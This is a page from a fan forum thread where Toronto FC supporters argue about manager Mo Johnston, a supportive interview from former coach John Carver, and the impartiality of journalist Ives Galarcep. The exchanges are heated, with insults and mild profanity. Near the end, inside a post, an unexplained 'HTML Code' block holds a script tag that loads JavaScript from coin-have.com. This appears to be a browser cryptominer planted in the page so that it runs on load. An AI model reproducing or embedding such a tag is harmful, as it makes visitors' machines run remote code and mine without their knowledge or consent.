Page 13 of 13 FirstFirst ... 3910111213
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by boban View Post
    Just curious, are you at all in any form, on the MLSE dole?

ahh, good old ad hominem.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by drewski View Post
    ahh, good old ad hominem.
    He wields it like a fiery Excalibur.

- Scott
    “Heroism breaks its heart, and idealism its back, on the intransigence of the credulous and the mediocre, manipulated by the cynical and the corrupt.” ~Christopher Hitchens

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by S_D View Post
    I am wondering who set up this interview. Was it Mo (TFC) or the papers? Since Gareth Wheeler wasn't available, it falls to Ives that fast? Convenient.
    Thought the same thing Dad!

Say what you want about Gareth Weasel…I doubt he'd be Mo's bitch!
    “We changed the entire league’s opinion of the viability of soccer in North America. And then we blew it because we chickened out." —Tim Leiweke

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Ah crap, here we go, from Ives' twitter:

"Former TFC coach John Carver gave his full backing to Mo Johnston amid the recent criticism from former TFC coach Chris Cummins & Ali Gerba"

"Carver: "If your team isn't performing, you're going to look for somebody to pin the blame on, and an easy target is Mo...."

" and people are jumping on the bandwagon."
    Last edited by Auzzy; 04-27-2010 at 07:23 PM.

olegunnar

Quote Originally Posted by Toronto_Bhoy View Post
    Thought the same thing Dad!

Say what you want about Gareth Weasel…I doubt he'd be Mo's bitch!
    No
    But Carver is.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

And continues at http://twitter.com/SoccerByIves --

Carver goes on, "He's a decent guy who loves football and loves Toronto FC. He wants to do what's best for that club."
    and the last Ives tweet for now:

I'll post the full story on my interview with Carver later tonight. Working it up now as I watch NYRB-Philly at Red Bull Arena.
    Last edited by Auzzy; 04-27-2010 at 07:28 PM.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Mo Jo and Ives are good buddies. Ives profits from being one of the only consistent sources of MLS coverage. He relies on his relationships with contacts in MLS and Mo is one of them. Over the years I've noticed he rarely speaks poorly of TFC and always approaches TFC topics with a positive spin.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

CC is a wanker...and always will be!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by olegunnar View Post
    No
    But Carver is.
    yeah he wants another job so is toeing the company line LOL

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Carver goes on, "He's a decent guy who loves football and loves Toronto FC. He wants to do what's best for that club."
    doesn't mean he has the ability to do what is best for the club

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

No
    But Carver is.
    Everyone was so anxious to hear from Carver but now he's no longer credible? Carver left of his own volition and either has no axe to grind with Mo or refuses to defame the character of his former employer for his own personal reasons. Perhaps it is also because of his invlovement with First Wave. In any case, I think it shows class on his part and I'm glad he didn't add fuel to the fire. I've had enough of this shit. Mo will be relieved of his managerial responsibilities at some point but until then, I just want to watch football!

olegunnar

Quote Originally Posted by ManUtd4ever View Post
    Everyone was so anxious to hear from Carver but now he's no longer credible? Carver left of his own volition and either has no axe to grind with Mo or refuses to defame the character of his former employer for his own personal reasons. Perhaps it is also because of his invlovement with First Wave. In any case, I think it shows class on his part and I'm glad he didn't add fuel to the fire. I've had enough of this shit. Mo will be relieved of his managerial responsibilities at some point but until then, I just want to watch football!
    Then say "no comment"

Didn't everyones mother teach them...if you have nothing nice to say then don't say anything at all.

To pull a 180 and totally change your story, and pretend certain things didn't happen is cowardly and disingenious. Then again I guess it's to be expected from a guy that walked away from the team once already

He better have gotten a very nice payday for this charade of an interview.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^ Agreed. This once again shows a total lack of professionalism from our Manager & Director of Soccer. He is obviously prolonging the farce, instead of just sucking it up, shutting up, and focussing on his job. Manufactured interview with Carver, by his buddy Ives? So now Carver is backing Mo, because Mo did such a good job getting him the players he needed or what????
    Last edited by Auzzy; 04-27-2010 at 07:53 PM.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I suspect there will be one or two members of the local media who thought they would get an exclusive based on their "apparent" solid relationship with Carver (Gerry Dobson) who won't be happy to read an out of town "glorified blogger" get this scoop.

That said the bottom line is that keeping Mo Jo in MLS is good for Ives and his SBI business. Integrity out the window like everything else MLSE/TFC when money is on the line.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Then say "no comment"

Didn't everyones mother teach them...if you have nothing nice to say then don't say anything at all.

To pull a 180 and totally change your story, and pretend certain things didn't happen is cowardly and disingenious. Then again I guess it's to be expected from a guy that walked away from the team once already

He better have gotten a very nice payday for this charade of an interview.
    This wouldn't be much of a forum if we all went along with that .

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

I love that now we are questioning the integrity of Ives Galarcep, based on the fact that he has supposedly retained a good relationship with Mo, and what Carver chose to say to him. Some of you guys really need to take a step back from all of this for a minute.

I thought Mo needed to be fired based on the merits of the shitshow our club has been - not based on whatever juicy inner-bubble info Cummins, or Gerba, or Carver chose to dish. I wanted to fire Mo before Cummins essentially slammed him, and I still want to fire Mo after Carver apparently supported him.

Some of you are casting aspersions way too freely right now, based on the tenuous relationships that wouldn't count as "proof" in any credible non-sports investigative journalism - Mo and Carver using the same agency, or Ives and Mo maintaining a good relationship.

All parties in these interviews have motives for what they do and say - I said it when Gerba gave his interview, and I will say it again here. The evidence for Mo's failure is evident all around the club. We don't need to hang off the words of disgruntled former employees, to form our own conclusions on the job he has done.

- Scott
    “Heroism breaks its heart, and idealism its back, on the intransigence of the credulous and the mediocre, manipulated by the cynical and the corrupt.” ~Christopher Hitchens

I_AM_CANADIAN

Call me suspicious, but the timing of this interview makes me think it was specifically intended to cast doubt upon what Gerba and CC have said. I don't buy it.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Ives' tweets & interview are now being dicussed at: http://redpatchboys.ca/forums/showthread.php?t=22168

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shakes McQueen View Post
    I love that now we are questioning the integrity of Ives Galarcep, based on the fact that he has supposedly retained a good relationship with Mo, and what Carver chose to say to him. Some of you guys really need to take a step back from all of this for a minute.

Some of you are casting aspersions way too freely right now, based on the tenuous relationships that wouldn't count as "proof" in any credible non-sports investigative journalism - Mo and Carver using the same agency, or Ives and Mo maintaining a good relationship.

All parties in these interviews have motives for what they do and say - I said it when Gerba gave his interview, and I will say it again here. The evidence for Mo's failure is evident all around the club. We don't need to hang off the words of disgruntled former employees, to form our own conclusions on the job he has done.

- Scott
    Odd though that Ives has stayed clear of any of this until today. He has been quite positive in the very little he has written about TFC this year. Interesting if this interview with Carver actually says anything of substance.

Well the biggest motive that makes the world go round is money...and I'm not sure how Gerba & Cummins stand to profit from their comments. That said for all we know the power brokers over at the Score have given Kristen Jack freedom to attack the team based on the business relationship that soured a couple of years ago.

True though the worst record in MLS history and a fan base that generally dislikes MO should be enough to justify change in the near future.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shakes McQueen View Post
    This is your stock response any time anyone dares to disagree with you on anything related to MLSE or their sports franchises. They are either "drinking the koolaid", or "on the MLSE dole".
    And your stock answer is to criticize anything I have to say with this same response.
    Sorry but I find it disappointing that a SG president would tell people on a board to shut up about a topic, a very hot one at that, that is just over 24 hrs old. Of course people have something to say. Let them say it.
    Also, my comment was not only based on his comments here, but on other actions he has taken which led me to that question. I'm not going to go into detail because that would cause a shit storm as a lot of people here, it would appear, have rose coloured glasses on.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

And your stock answer is to criticize anything I have to say with this same response.
    Sorry but I find it disappointing that a SG president would tell people on a board to shut up about a topic, a very hot one at that, that is just over 24 hrs old. Of course people have something to say. Let them say it.
    Also, my comment was not only based on his comments here, but on other actions he has taken which led me to that question. I'm not going to go into detail because that would cause a shit storm as a lot of people here, it would appear, have rose coloured glasses on.

You quote a post of Boris' in which he says "I encourage discussion about this" and now accuse him of telling people "to shut up about a topic"?

RPB Member
    Past-President

Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)

Okay, did he say to shut up or did he say that we had a win and maybe there is something to be happy about and some of this energy could be used for lets say....the game tomorrow?

I just dont get what the point of making the statement you did was? Are you that crazy to think calling out the President of the group on our own boards wouldn't get supportive responses?

Sounds like trolling to me.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

What I find disappointing is the fact you have put words in my mouth.
    I said that this conversation is healthy but people are putting too much stock on something that was just released. I further stated that we have only seen the start so if we do anything we should wait and see.

I was one of the few people to go in the media and demand effort from everyone on this team. Mojo included. What I don't want to protest at this time? That makes me a mlse employee? Please. I only want RPB to be seen in a respectable and credible light. When our voice is heard it will be loud and won't be ignored

HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Kristian Jack is putting in some good work.

Him and James Sharman are my favourite Canadian soccer personalities.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

It would seem to make sense that I would call you out for this canard every time you choose to use it. I can't criticize "anything you say" with the same response, because it only specifically applies in cases where you're accusing people of being MLSE stooges. Swing and miss.

- Scott